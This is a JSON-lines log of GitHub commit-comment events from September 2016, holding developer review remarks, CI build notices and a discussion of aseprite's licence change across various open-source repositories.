{"id":"4503310653","type":"CommitCommentEvent","actor":{"login":"palaster"},"repo":{"name":"Vazkii/Charset"},"payload":{"comment":{"id":18865567,"position":23,"line":502,"path":"src/main/java/pl/asie/charset/pipes/pipe/PartPipe.java","commit_id":"edb3e18d3caefedc76eb7b2e34fe1af18c9dda6a","created_at":"2016-09-01T15:29:37Z","updated_at":"2016-09-01T15:29:37Z","body":"I think I see what you mean, I pull request a fix in a little bit."}},"created_at":"2016-09-01T15:29:37Z"}
{"id":"4503313820","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":18865573,"position":2,"line":5309,"path":"src/game/Spell.cpp","commit_id":"57d7276353f9e75359565ae11a54f09de7cb2f44","created_at":"2016-09-01T15:30:07Z","updated_at":"2016-09-01T15:30:07Z","body":"These trailing white spaces I just now noticed when porting to classic."}},"created_at":"2016-09-01T15:30:07Z"}
{"id":"4503315678","type":"CommitCommentEvent","actor":{"login":"neilmacintosh"},"repo":{"name":"Microsoft/GSL"},"payload":{"comment":{"id":18865576,"position":null,"line":null,"path":null,"commit_id":"f8ef4e235531193ef31021958320bcf6dd4775a0","created_at":"2016-09-01T15:30:24Z","updated_at":"2016-09-01T15:30:24Z","body":"@viboes this has been suggested and rejected previously. @gdr-at-ms is correct: it just encourages the macros we want to reduce (and ultimately remove altogether). Plus, experience shows it's difficult to ensure push/pop macros match correctly across physically separate files. You'll notice too that we already try to minimize the configuration macros in use to only those required for each header."}},"created_at":"2016-09-01T15:30:24Z"}
{"id":"4503316972","type":"CommitCommentEvent","actor":{"login":"yan-ming"},"repo":{"name":"RadeonOpenCompute/hcc"},"payload":{"comment":{"id":18865579,"position":4,"line":123,"path":"lib/hsa/mcwamp_hsa.cpp","commit_id":"f8f82c7aa46b45cbc963f61a4139637c901cfe76","created_at":"2016-09-01T15:30:36Z","updated_at":"2016-09-01T15:30:36Z","body":"see it, thanks!"}},"created_at":"2016-09-01T15:30:36Z"}
{"id":"4503322667","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18865589,"position":25,"line":427,"path":"application/src/main/webapp/js/notif.js","commit_id":"6a25bae752f28e2f4b3ca98bb01c46f0af3790ce","created_at":"2016-09-01T15:31:30Z","updated_at":"2016-09-01T15:31:30Z","body":"Please add the reason of this \"hack\" in your comment and the link to the firefox bug."}},"created_at":"2016-09-01T15:31:30Z"}
{"id":"4503324200","type":"CommitCommentEvent","actor":{"login":"cpitclaudel"},"repo":{"name":"flycheck/flycheck"},"payload":{"comment":{"id":18865595,"position":null,"line":null,"path":null,"commit_id":"a8475a82177d30cb51480313eddaafb3d2d9aa79","created_at":"2016-09-01T15:31:44Z","updated_at":"2016-09-01T15:31:44Z","body":"Ah, I see. This function is being called outside of tabulated-list-mode."}},"created_at":"2016-09-01T15:31:44Z"}
{"id":"4503326007","type":"CommitCommentEvent","actor":{"login":"lunaryorn"},"repo":{"name":"flycheck/flycheck"},"payload":{"comment":{"id":18865600,"position":null,"line":null,"path":null,"commit_id":"a8475a82177d30cb51480313eddaafb3d2d9aa79","created_at":"2016-09-01T15:32:03Z","updated_at":"2016-09-01T15:32:03Z","body":"@cpitclaudel Never mind, happens.  The CI is there to break it 😁 "}},"created_at":"2016-09-01T15:32:03Z"}
{"id":"4503332290","type":"CommitCommentEvent","actor":{"login":"crowman69"},"repo":{"name":"LfourZ/navmeshes"},"payload":{"comment":{"id":18865623,"position":null,"line":null,"path":null,"commit_id":"0ab56f6a7cb94a4ec8966517b5ca447cc409e0af","created_at":"2016-09-01T15:33:02Z","updated_at":"2016-09-01T15:33:02Z","body":"Came here to say this"}},"created_at":"2016-09-01T15:33:02Z"}
{"id":"4503341800","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"git-for-windows/git"},"payload":{"comment":{"id":18865641,"position":null,"line":null,"path":null,"commit_id":"c465e1108af1b3d65a47d06f1ca4af7bfe8ad629","created_at":"2016-09-01T15:34:33Z","updated_at":"2016-09-01T15:34:33Z","body":"@nalla The rebase--helper is pushed into Git for Windows v2.10.0 before it arrives in upstream Git, that is true.\r\n\r\nBut the (15 or 16) patch series of which this work consists have been mostly merged, and the last batch (but for the last two patch series) are under review.\r\n\r\nSo at some stage, this will hopefully make it upstream, although I have no idea when."}},"created_at":"2016-09-01T15:34:33Z"}
{"id":"4503342753","type":"CommitCommentEvent","actor":{"login":"andreiglingeanu"},"repo":{"name":"ThemeFuse/Unyson-PageBuilder-Extension"},"payload":{"comment":{"id":18865644,"position":null,"line":null,"path":null,"commit_id":"cd32bc77f32ee0516d3f49321561dc51cad79f42","created_at":"2016-09-01T15:34:42Z","updated_at":"2016-09-01T15:34:42Z","body":"Sorry"}},"created_at":"2016-09-01T15:34:42Z"}
{"id":"4503344012","type":"CommitCommentEvent","actor":{"login":"stevepeak"},"repo":{"name":"codecov/codecov-bash"},"payload":{"comment":{"id":18865647,"position":6,"line":444,"path":"codecov","commit_id":"51bbb4bf8b6ee69348d45d37de2c47e48c9b3e26","created_at":"2016-09-01T15:34:54Z","updated_at":"2016-09-01T15:34:54Z","body":"Thank you @bonkey for your help! 👍 "}},"created_at":"2016-09-01T15:34:54Z"}
{"id":"4503344414","type":"CommitCommentEvent","actor":{"login":"MCPEPluginer16"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18865649,"position":null,"line":null,"path":null,"commit_id":"3798b65822fbf7ec96811acf8807e31687f27181","created_at":"2016-09-01T15:34:58Z","updated_at":"2016-09-01T15:34:58Z","body":"thx"}},"created_at":"2016-09-01T15:34:58Z"}
{"id":"4503348020","type":"CommitCommentEvent","actor":{"login":"devernay"},"repo":{"name":"ArashPartow/math-parser-benchmark-project"},"payload":{"comment":{"id":18865657,"position":null,"line":null,"path":null,"commit_id":"62f69936ec96803f70d983ad324ba6f68f298de3","created_at":"2016-09-01T15:35:33Z","updated_at":"2016-09-01T15:35:33Z","body":"@ArashPartow would https://github.com/wdas/seexpr/ be a good candidate for this great benchmark? It can optionally use LLVM to compile the expressions"}},"created_at":"2016-09-01T15:35:33Z"}
{"id":"4503351430","type":"CommitCommentEvent","actor":{"login":"Jak71004"},"repo":{"name":"Jak71004/CapreaTechnica"},"payload":{"comment":{"id":18865667,"position":null,"line":null,"path":null,"commit_id":"a1b7742476192f81afa30b4604be193c0b33630f","created_at":"2016-09-01T15:36:07Z","updated_at":"2016-09-01T15:36:07Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;jm2BRsRv&#x2F;1-receive-sms\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Receive SMS</a>"}},"created_at":"2016-09-01T15:36:07Z"}
{"id":"4503353449","type":"CommitCommentEvent","actor":{"login":"kaspar030"},"repo":{"name":"RIOT-OS/RIOT"},"payload":{"comment":{"id":18865679,"position":2,"line":311,"path":"sys/net/gnrc/link_layer/iqueue_mac/iqueue_mac.c","commit_id":"9f05a4a943ff9432f910ad34c03517343d3e8149","created_at":"2016-09-01T15:36:26Z","updated_at":"2016-09-01T15:36:26Z","body":"here and most other functions: please move ```{``` to next line."}},"created_at":"2016-09-01T15:36:26Z"}
{"id":"4503357481","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18865689,"position":null,"line":null,"path":null,"commit_id":"7f3eced6e67f4e18960bfb94a977de7b814f9b55","created_at":"2016-09-01T15:37:06Z","updated_at":"2016-09-01T15:37:06Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 895](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12261&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 234, ignored: 3 Build time: 00:07:55"}},"created_at":"2016-09-01T15:37:06Z"}
{"id":"4503357785","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18865690,"position":null,"line":null,"path":null,"commit_id":"2fde2d21cd5069c000d70b1cec6dd6767ef444cd","created_at":"2016-09-01T15:37:09Z","updated_at":"2016-09-01T15:37:09Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.235.2fde2d21cd5069c000d70b1cec6dd6767ef444cd](http://build.palaso.org/viewLog.html?buildId=76360&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1493, ignored: 17 Build time: 00:07:24"}},"created_at":"2016-09-01T15:37:09Z"}
{"id":"4503361648","type":"CommitCommentEvent","actor":{"login":"olji"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18865699,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T15:37:44Z","updated_at":"2016-09-01T15:37:44Z","body":"The statement that this software is open source in README.md is not true as the EULA conflicts with the Open Source Definition (https://opensource.org/docs/osd) on several points.\r\n\r\nThat statement should be removed or changed, as this right now is proprietary software with viewable source code from what I can understand, calling it open source will just confuse and mislead your users."}},"created_at":"2016-09-01T15:37:44Z"}
{"id":"4503362694","type":"CommitCommentEvent","actor":{"login":"elserj"},"repo":{"name":"Planteome/go-site-xrefs-fork"},"payload":{"comment":{"id":18865702,"position":null,"line":null,"path":null,"commit_id":"afcbe14a45cc4e25db3865035c42de8a48e637ac","created_at":"2016-09-01T15:37:55Z","updated_at":"2016-09-01T15:37:55Z","body":"It isn't exactly broken, the link works it is just that Brachypodium sylvaticum ssp Corvallis (and probably Greece, maybe others) were done in house and have not been submitted to Ensembl.  \r\n\r\nI see 2 solutions, we either leave it as is, and someday get the sequences submitted to Ensembl, or we change the few that don't work to another database source. The problem with the second is that what do we change it to? Planteome_gene?  Also, these were done as part of a set (all the go_ortholog_gene* assoc files) and changing the db source makes that not as obvious.\r\n\r\nI don't really mind which choice we do, but I don't think I'm the person to make that choice, just letting you guys know what options I see.\r\n\r\n@jaiswalp, @cooperl09 , thoughts? "}},"created_at":"2016-09-01T15:37:55Z"}
{"id":"4503363065","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18865705,"position":null,"line":null,"path":null,"commit_id":"7176894fad445f7aec436e9593c7aa7d0e99dab0","created_at":"2016-09-01T15:37:59Z","updated_at":"2016-09-01T15:37:59Z","body":"saw approval from JeetKunDoug\nat https://github.com/basho/riak_kv/commit/7176894fad445f7aec436e9593c7aa7d0e99dab0"}},"created_at":"2016-09-01T15:37:59Z"}
{"id":"4503363133","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18865706,"position":null,"line":null,"path":null,"commit_id":"7176894fad445f7aec436e9593c7aa7d0e99dab0","created_at":"2016-09-01T15:38:00Z","updated_at":"2016-09-01T15:38:00Z","body":"merging basho/riak_kv/develop-2.2-job-switches-code-abstraction = 7176894f into borshop-integration-1469-develop-2.2-job-switches-code-abstraction"}},"created_at":"2016-09-01T15:38:00Z"}
{"id":"4503363160","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18865707,"position":null,"line":null,"path":null,"commit_id":"7176894fad445f7aec436e9593c7aa7d0e99dab0","created_at":"2016-09-01T15:38:00Z","updated_at":"2016-09-01T15:38:00Z","body":"basho/riak_kv/develop-2.2-job-switches-code-abstraction = 7176894f merged ok, testing candidate = d368032c"}},"created_at":"2016-09-01T15:38:00Z"}
{"id":"4503366640","type":"CommitCommentEvent","actor":{"login":"FullCreamMilkMan"},"repo":{"name":"bradfrost/atomic-design"},"payload":{"comment":{"id":18865718,"position":56,"line":225,"path":"chapter-1.md","commit_id":"24197ac0c3889e59d58ec42025fadc1dff3934d3","created_at":"2016-09-01T15:38:34Z","updated_at":"2016-09-01T15:38:34Z","body":"To be sure, capitalization, particularly in relation to potential proper nouns, can be problematic. \r\n\r\nGoogle cleverly chose material design as the name for its system. Although Google does not, most people cap it up, probably to distinguish MD from other things, even though in a web design context there's unlikely to be any confusion with the design of material, whether cloth or otherwise. I believe many people make a connection with material_s_ design (a branch of engineering). And that's exactly what Google intended.\r\n\r\nIn cases like these, I tend towards dropping caps – they nudge the reader's flow, and there's far too much gratuitous capitalization in written English these days, particularly about web design and development.\r\n\r\nNevertheless, I know full well that Material Design is common and people might expect it. My advice is to drop the caps. But: the caps might aid clarity; the phrase appears only here in the manuscript, so it's not dotted all over the place; and you are the author. I will respect your authority! And leave it up to you.\r\n\r\nDid I dodge that well enough? ;)"}},"created_at":"2016-09-01T15:38:34Z"}
{"id":"4503370580","type":"CommitCommentEvent","actor":{"login":"dacap"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18865726,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T15:39:12Z","updated_at":"2016-09-01T15:39:12Z","body":"Thanks for the words @farvardin \r\n\r\n@olji I'll fix that issue today"}},"created_at":"2016-09-01T15:39:12Z"}
{"id":"4503372357","type":"CommitCommentEvent","actor":{"login":"tomjaguarpaw"},"repo":{"name":"clash-lang/clash-prelude"},"payload":{"comment":{"id":18865728,"position":null,"line":null,"path":null,"commit_id":"aeac962ec106ec0dcf7ae1631ed5a1cb0103dc35","created_at":"2016-09-01T15:39:28Z","updated_at":"2016-09-01T15:39:28Z","body":"Does this mean that `undefined` still breaks the block RAM (because it's exception is of type `ErrorCall`, not `ErrorX`), and instead I should be using `errorX`?"}},"created_at":"2016-09-01T15:39:28Z"}
{"id":"4503378727","type":"CommitCommentEvent","actor":{"login":"svanderburg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18865743,"position":null,"line":null,"path":null,"commit_id":"5ce6cd0106242648ccc9e7ea64716a866eca152c","created_at":"2016-09-01T15:40:30Z","updated_at":"2016-09-01T15:40:30Z","body":"Seems to work again. Now 2 packages in my backlog that require fixing, but evaluation seems to pass..."}},"created_at":"2016-09-01T15:40:30Z"}
{"id":"4503380985","type":"CommitCommentEvent","actor":{"login":"Dillybob92"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18865750,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T15:40:50Z","updated_at":"2016-09-01T15:40:50Z","body":"Would it still be okay to create a plugin (lets say for Godot) that compiles and install it as an addon automatically? Or do we have to use asesprite outside of any program and then just use the frames it exports?"}},"created_at":"2016-09-01T15:40:50Z"}
{"id":"4503385658","type":"CommitCommentEvent","actor":{"login":"dsmiley"},"repo":{"name":"voyagersearch/SolrTextTagger"},"payload":{"comment":{"id":18865758,"position":null,"line":null,"path":null,"commit_id":"734756a19777ee1e1d098ffab527c375778fd381","created_at":"2016-09-01T15:41:34Z","updated_at":"2016-09-01T15:41:34Z","body":"A pull request to upstream for this would be nice.  Are there any other deltas requiring your fork?"}},"created_at":"2016-09-01T15:41:34Z"}
{"id":"4503388734","type":"CommitCommentEvent","actor":{"login":"SourceCodeLab"},"repo":{"name":"SourceCodeLab/IT2320"},"payload":{"comment":{"id":18865763,"position":null,"line":null,"path":null,"commit_id":"1d1884a58b93d2d0a3b86fa560ceea3ed811c320","created_at":"2016-09-01T15:42:05Z","updated_at":"2016-09-01T15:42:05Z","body":"123"}},"created_at":"2016-09-01T15:42:05Z"}
{"id":"4503390975","type":"CommitCommentEvent","actor":{"login":"christiaanb"},"repo":{"name":"clash-lang/clash-prelude"},"payload":{"comment":{"id":18865769,"position":null,"line":null,"path":null,"commit_id":"aeac962ec106ec0dcf7ae1631ed5a1cb0103dc35","created_at":"2016-09-01T15:42:26Z","updated_at":"2016-09-01T15:42:26Z","body":"Yes, `errorX` means \"undefined\", while `error` means _true_ program error and stop now. I intent to update the clash-prelude so that `undefined = errorX \"undefined\"`."}},"created_at":"2016-09-01T15:42:26Z"}
{"id":"4503391315","type":"CommitCommentEvent","actor":{"login":"eoma"},"repo":{"name":"KhronosGroup/Vulkan-LoaderAndValidationLayers"},"payload":{"comment":{"id":18865773,"position":10,"line":47,"path":"include/vulkan/vulkan.hpp","commit_id":"9696299c6135ceb92285b4692d3f01e2de7fa983","created_at":"2016-09-01T15:42:29Z","updated_at":"2016-09-01T15:42:29Z","body":"This change breaks all 64-bit c++ builds as VK_DEFINE_NON_DISPATCHABLE_HANDLE is always defined."}},"created_at":"2016-09-01T15:42:29Z"}
{"id":"4503395231","type":"CommitCommentEvent","actor":{"login":"Echelon9"},"repo":{"name":"empirical-org/Empirical-Core"},"payload":{"comment":{"id":18865783,"position":null,"line":null,"path":null,"commit_id":"16013c19f6ca6a6f1c4eef0186cee7882a8ffeb7","created_at":"2016-09-01T15:43:04Z","updated_at":"2016-09-01T15:43:04Z","body":"Perhaps something similar to this PR? https://github.com/empirical-org/Empirical-Core/pull/1600. Thoughts @ddmck @RyanNovas?"}},"created_at":"2016-09-01T15:43:04Z"}
{"id":"4503398883","type":"CommitCommentEvent","actor":{"login":"mtrabelsi"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18865793,"position":18,"line":420,"path":"application/src/main/webapp/js/notif.js","commit_id":"6a25bae752f28e2f4b3ca98bb01c46f0af3790ce","created_at":"2016-09-01T15:43:37Z","updated_at":"2016-09-01T15:43:37Z","body":"It's ok on my local code, not sure what's wrong"}},"created_at":"2016-09-01T15:43:37Z"}
{"id":"4503398981","type":"CommitCommentEvent","actor":{"login":"triple111"},"repo":{"name":"triple111/MUDscape"},"payload":{"comment":{"id":18865794,"position":null,"line":null,"path":null,"commit_id":"24ac8b3b2a4dcd50a1a1e5f61920c79600179a95","created_at":"2016-09-01T15:43:38Z","updated_at":"2016-09-01T15:43:38Z","body":"Added combat level calculation "}},"created_at":"2016-09-01T15:43:38Z"}
{"id":"4503399694","type":"CommitCommentEvent","actor":{"login":"mtrabelsi"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18865796,"position":25,"line":427,"path":"application/src/main/webapp/js/notif.js","commit_id":"6a25bae752f28e2f4b3ca98bb01c46f0af3790ce","created_at":"2016-09-01T15:43:44Z","updated_at":"2016-09-01T15:43:44Z","body":"done"}},"created_at":"2016-09-01T15:43:44Z"}
{"id":"4503400332","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18865800,"position":null,"line":null,"path":null,"commit_id":"911b45d1dc53947a25edf764e45cd92d8ef45bd3","created_at":"2016-09-01T15:43:49Z","updated_at":"2016-09-01T15:43:49Z","body":"Congrats!"}},"created_at":"2016-09-01T15:43:49Z"}
{"id":"4503401522","type":"CommitCommentEvent","actor":{"login":"LuisPro"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18865804,"position":null,"line":null,"path":null,"commit_id":"bcd2a2af8ad5f7aebce4c5e7fc0ec5b2f373cd24","created_at":"2016-09-01T15:44:01Z","updated_at":"2016-09-01T15:44:01Z","body":"i think this is better:\r\n\r\nin: void Player::onThink(uint32_t interval)\r\n\r\n\t\tif(client)\r\n\t\t\tclient->sendPing();\r\n\t\telse if(!getTile()->hasFlag(TILESTATE_NOLOGOUT) && !isConnecting && !pzLocked && !hasCondition(CONDITION_INFIGHT))\r\n\t\t\tg_game.removeCreature(this, true);\r\n\t}"}},"created_at":"2016-09-01T15:44:01Z"}
{"id":"4503404369","type":"CommitCommentEvent","actor":{"login":"dcdowney"},"repo":{"name":"madhavsuresh/mta"},"payload":{"comment":{"id":18865810,"position":null,"line":null,"path":null,"commit_id":"f64f8a9af3a184c9d9f4084e85e88ecf9b64efff","created_at":"2016-09-01T15:44:26Z","updated_at":"2016-09-01T15:44:26Z","body":"Awesome -- test framework looks great."}},"created_at":"2016-09-01T15:44:26Z"}
{"id":"4503414818","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":18865825,"position":58,"line":58,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/fn/impl/testing/TestDateConversions.java","commit_id":"072d8b0ff5de6104c174635ea6de7e73b74b0f2f","created_at":"2016-09-01T15:46:05Z","updated_at":"2016-09-01T15:46:05Z","body":"unOrdered() to the next line"}},"created_at":"2016-09-01T15:46:05Z"}
{"id":"4503415376","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":18865827,"position":78,"line":78,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/fn/impl/testing/TestDateConversions.java","commit_id":"072d8b0ff5de6104c174635ea6de7e73b74b0f2f","created_at":"2016-09-01T15:46:11Z","updated_at":"2016-09-01T15:46:11Z","body":"unOrdered() to the next line"}},"created_at":"2016-09-01T15:46:11Z"}
{"id":"4503416332","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":18865828,"position":140,"line":140,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/fn/impl/testing/TestDateConversions.java","commit_id":"072d8b0ff5de6104c174635ea6de7e73b74b0f2f","created_at":"2016-09-01T15:46:20Z","updated_at":"2016-09-01T15:46:20Z","body":"unOrdered() to the next line"}},"created_at":"2016-09-01T15:46:20Z"}
{"id":"4503416937","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":18865831,"position":160,"line":160,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/fn/impl/testing/TestDateConversions.java","commit_id":"072d8b0ff5de6104c174635ea6de7e73b74b0f2f","created_at":"2016-09-01T15:46:26Z","updated_at":"2016-09-01T15:46:26Z","body":"unOrdered() to the next line"}},"created_at":"2016-09-01T15:46:26Z"}
{"id":"4503424074","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18865841,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T15:47:36Z","updated_at":"2016-09-01T15:47:36Z","body":"@JFDaly:\r\n\r\nAlright, GetNumTotalBuildings will now skip dummy (buildings marked as dummy in their building info), NW and WW. There are three bools that default to true if not defined, GetNumTotalBuildings(bool bSkipDummy, bool bSkipWW, bool bSkipNW). So doing it as GetNumTotalBuildings() will be (true, true, true).\r\n\r\nEndContract had a loop I misssed - fixed.\r\n\r\nChangeContractTurns was resetting the value, not adding to it. Fixed. It also supports negative values so you can shorten duration as well (if you ever need that)."}},"created_at":"2016-09-01T15:47:36Z"}
{"id":"4503425936","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18865845,"position":6,"line":127,"path":"Journey-of-the-gods/main.cpp","commit_id":"6548fe165a712fe44124ed6b652d46644cd643d2","created_at":"2016-09-01T15:47:55Z","updated_at":"2016-09-01T15:47:55Z","body":"SEMICOLON! YOU FORGOT A SEMICOLON!"}},"created_at":"2016-09-01T15:47:55Z"}
{"id":"4503427106","type":"CommitCommentEvent","actor":{"login":"jonathanmorley"},"repo":{"name":"blairham/nuget-cookbook"},"payload":{"comment":{"id":18865846,"position":null,"line":null,"path":null,"commit_id":"cb69abe406e53d3918847134490f829a6c21e9da","created_at":"2016-09-01T15:48:08Z","updated_at":"2016-09-01T15:48:08Z","body":"For some reason, the inspec tests don't run correctly from within kitchen"}},"created_at":"2016-09-01T15:48:08Z"}
{"id":"4503429703","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18865855,"position":null,"line":null,"path":null,"commit_id":"5ce6cd0106242648ccc9e7ea64716a866eca152c","created_at":"2016-09-01T15:48:32Z","updated_at":"2016-09-01T15:48:32Z","body":"Yours? https://travis-ci.org/NixOS/nixpkgs/jobs/156849308"}},"created_at":"2016-09-01T15:48:32Z"}
{"id":"4503438265","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18865879,"position":null,"line":null,"path":null,"commit_id":"7176894fad445f7aec436e9593c7aa7d0e99dab0","created_at":"2016-09-01T15:49:59Z","updated_at":"2016-09-01T15:49:59Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_kv/builds/3892\n"}},"created_at":"2016-09-01T15:49:59Z"}
{"id":"4503438412","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18865881,"position":null,"line":null,"path":null,"commit_id":"7200a6b044c9f7c67fc3d95b2b8323580702556f","created_at":"2016-09-01T15:50:00Z","updated_at":"2016-09-01T15:50:00Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/357/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T15:50:00Z"}
{"id":"4503438521","type":"CommitCommentEvent","actor":{"login":"ottenhoff"},"repo":{"name":"sakaiproject/sakai"},"payload":{"comment":{"id":18865882,"position":null,"line":null,"path":null,"commit_id":"0155c1ffe178a82f18186777254c3ece5ec7e810","created_at":"2016-09-01T15:50:02Z","updated_at":"2016-09-01T15:50:02Z","body":"Hi @mpellicer , can you fix this?"}},"created_at":"2016-09-01T15:50:02Z"}
{"id":"4503438650","type":"CommitCommentEvent","actor":{"login":"gerrywastaken"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18865883,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T15:50:03Z","updated_at":"2016-09-01T15:50:03Z","body":"One thing that's a bit confusing... it seems there were other contribuiters (http://www.aseprite.org/contributors/ possibly others through code submitted via github issues) to this project who made their contributions to a GPL project. Did you have them all assign copyright to you for their changes, or remove their changes, before attempting to change the license?"}},"created_at":"2016-09-01T15:50:03Z"}
{"id":"4503438965","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18865884,"position":null,"line":null,"path":null,"commit_id":"eecdae8d35b42343e03d9917469fb18acef5c207","created_at":"2016-09-01T15:50:07Z","updated_at":"2016-09-01T15:50:07Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 896](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12281&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T15:50:07Z"}
{"id":"4503440122","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"input-output-hk/rscoin-core"},"payload":{"comment":{"id":18865888,"position":null,"line":null,"path":null,"commit_id":"f0ec5a3d806061c1b4fdd00ccddbe99177418be5","created_at":"2016-09-01T15:50:18Z","updated_at":"2016-09-01T15:50:18Z","body":"Maybe let's have default `Setup.hs`? I heard it's considered good practice."}},"created_at":"2016-09-01T15:50:18Z"}
{"id":"4503441271","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18865889,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T15:50:29Z","updated_at":"2016-09-01T15:50:29Z","body":"@LoneGazebo We don't need to comment that out in the CP, I just needed to change isNativeDomain to account for it properly."}},"created_at":"2016-09-01T15:50:29Z"}
{"id":"4503441538","type":"CommitCommentEvent","actor":{"login":"JeromeMartinez"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18865891,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T15:50:31Z","updated_at":"2016-09-01T15:50:31Z","body":"[same for the FAQ](http://www.aseprite.org/faq/#if-aseprite-is-open-source-how-is-that-you-are-selling-it), \"If Aseprite is open source, (...)\" is no more true."}},"created_at":"2016-09-01T15:50:31Z"}
{"id":"4503442682","type":"CommitCommentEvent","actor":{"login":"waldyrious"},"repo":{"name":"tldr-pages/tldr"},"payload":{"comment":{"id":18865896,"position":null,"line":null,"path":null,"commit_id":"34aec29c0886bf0257f7b090af8329c2c7f06dc7","created_at":"2016-09-01T15:50:42Z","updated_at":"2016-09-01T15:50:42Z","body":"@agnivade when I squash commits I try to also clean up the long description, only leaving stuff that is indeed descriptive of the changes. I suggest you do the same :)"}},"created_at":"2016-09-01T15:50:42Z"}
{"id":"4503450584","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18865918,"position":18,"line":420,"path":"application/src/main/webapp/js/notif.js","commit_id":"6a25bae752f28e2f4b3ca98bb01c46f0af3790ce","created_at":"2016-09-01T15:51:59Z","updated_at":"2016-09-01T15:51:59Z","body":"You used a tab instead of only spaces."}},"created_at":"2016-09-01T15:51:59Z"}
